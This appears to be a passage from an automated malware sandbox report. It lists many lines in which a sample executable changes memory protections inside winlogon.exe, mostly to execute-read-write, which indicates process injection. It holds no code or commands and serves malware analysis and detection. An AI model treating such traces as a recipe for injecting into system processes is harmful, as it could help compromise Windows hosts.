Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C974000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C976000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C980000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C981000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C992000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C994000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C996000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9A0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9A1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9B2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9B4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9B6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9C0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9C1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9D2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9D4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9D6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9E0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9E1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9F2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9F4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: C9F6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA12000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA14000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA32000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA34000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA52000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA54000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA72000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA74000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA92000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA94000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAB2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAB4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAD2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAD4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAF2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAF4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB12000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB14000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB32000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB34000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB52000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB54000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB72000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB74000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB92000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB94000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBB2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBB4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBD2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBD4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBF2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBF4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC12000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC14000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC32000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC34000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC52000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC54000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC72000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC74000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC92000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC94000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCB2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCB4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCD2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCD4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCF2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCF4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD12000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD14000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD32000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD34000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD52000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD54000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD72000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD74000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD92000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD94000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDB2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDB4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDD2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDD4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDF2000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDF4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE12000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE14000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE32000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE34000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE52000 protect: page execute and read and writeJump to behavior
